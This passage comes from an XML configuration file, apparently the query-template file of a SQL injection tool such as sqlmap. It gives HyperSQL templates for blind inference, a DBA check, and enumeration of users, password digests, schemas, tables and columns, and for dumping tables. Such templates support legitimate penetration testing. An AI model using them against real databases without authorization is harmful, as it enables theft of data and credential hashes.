<blind query="SELECT tabschema FROM (SELECT DISTINCT(tabschema) FROM sysstat.columns WHERE %s) AS foobar" query2="SELECT DISTINCT(tabname) FROM sysstat.columns WHERE tabschema='%s'" count="SELECT COUNT(DISTINCT(tabschema)) FROM sysstat.columns WHERE %s" count2="SELECT COUNT(DISTINCT(tabname)) FROM sysstat.columns WHERE tabschema='%s'" condition="colname" condition2="tabschema" condition3="tabname"/>
</search_column>
</dbms>
<!-- HSQL (Based on MYSQL)-->
<dbms value="HyperSQL">
<cast query="CAST(%s AS LONGVARCHAR)"/>
<length query="CHAR_LENGTH(%s)"/>
<isnull query="IFNULL(%s,' ')"/>
<delimiter query=","/>
<limit query="LIMIT %d %d"/>
<limitregexp query="\s+LIMIT\s+([\d]+)\s*\,\s*([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
<limitgroupstart query="1"/>
<limitgroupstop query="2"/>
<limitstring query=" LIMIT "/>
<order query="ORDER BY %s ASC"/>
<count query="COUNT(%s)"/>
<comment query="--" query2="/*" query3="//"/>
<substring query="SUBSTR((%s),%d,%d)"/>
<concatenate query="CONCAT(%s,%s)"/>
<case query="(CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
<hex query="RAWTOHEX(%s)"/>
<inference query="ASCII(SUBSTR((%s),%d,1))>%d"/>
<banner query="DATABASE_VERSION()"/>
<current_user query="CURRENT_USER"/>
<current_db query="DATABASE()"/>
<hostname query=""/>
<is_dba query="SELECT ADMIN FROM INFORMATION_SCHEMA.SYSTEM_USERS WHERE USER=CURRENT_USER"/>
<check_udf/>
<users>
<inband query="SELECT user FROM INFORMATION_SCHEMA.SYSTEM_USERS"/>
<!-- LIMIT is needed at start for v1.7 this gets mangled unless no-cast is used -->
<blind query="SELECT LIMIT %d 1 DISTINCT(user) FROM INFORMATION_SCHEMA.SYSTEM_USERS" count="SELECT COUNT(DISTINCT(user)) FROM INFORMATION_SCHEMA.SYSTEM_USERS"/>
</users>
<passwords>
<!-- Passwords only shown in later versions &gt;=2.0 -->
<inband query="SELECT user_name,password_digest FROM INFORMATION_SCHEMA.SYSTEM_USERS" condition="user_name"/>
<blind query="SELECT LIMIT %d 1 DISTINCT(password_digest) FROM INFORMATION_SCHEMA.SYSTEM_USERS WHERE user_name='%s'" count="SELECT COUNT(DISTINCT(password_digest)) FROM INFORMATION_SCHEMA.SYSTEM_USERS WHERE user_name='%s'"/>
</passwords>
<privileges/>
<roles/>
<dbs>
<inband query="SELECT table_schem FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS" />
<blind query="SELECT LIMIT %d 1 DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS" count="SELECT COUNT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS"/>
</dbs>
<tables>
<inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES" condition="table_schem"/>
<blind query="SELECT LIMIT %d 1 table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE table_schem='%s' " count="SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE table_schem='%s'"/>
</tables>
<columns>
<inband query="SELECT column_name,type_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND table_schem='%s'" condition="column_name"/>
<blind query="SELECT column_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND table_schem='%s'" query2="SELECT column_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND column_name='%s' AND table_schema='%s'" count="SELECT COUNT(column_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'" condition="column_name"/>
</columns>
<dump_table>
<inband query="SELECT %s FROM %s.%s ORDER BY %s"/>
<blind query="SELECT LIMIT %d 1 %s FROM %s.%s ORDER BY %s " count="SELECT COUNT(*) FROM %s.%s"/>
</dump_table>
<search_db>
<inband query="SELECT table_schem FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS WHERE %s" condition="table_schem"/>
<blind query="SELECT DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS WHERE %s" count="SELECT COUNT(DISTINCT(table_schem)) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS WHERE %s" condition="table_schem"/>
</search_db>
<search_table>
<inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE %s" condition="table_name" condition2="table_schem"/>
<blind query="SELECT DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE %s" count="SELECT COUNT(DISTINCT(table_schem)) FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE %s" condition="table_name" condition2="table_schem"/>
</search_table>
<search_column>
<inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE %s" condition="column_name" condition2="table_schem" condition3="table_name"/>
<blind query="SELECT DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE %s" count="SELECT COUNT(DISTINCT(table_schem)) FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE %s" condition="column_name" condition2="table_schem" condition3="table_name"/>
</search_column>
</dbms>
</root>